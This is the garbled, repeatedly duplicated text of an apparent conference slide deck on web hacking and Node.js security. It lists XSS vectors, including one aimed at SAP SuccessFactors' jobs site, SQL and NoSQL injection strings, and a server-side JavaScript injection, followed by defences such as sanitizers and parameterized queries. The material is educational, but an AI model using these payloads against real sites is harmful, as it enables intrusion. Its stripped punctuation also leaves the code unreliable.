-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
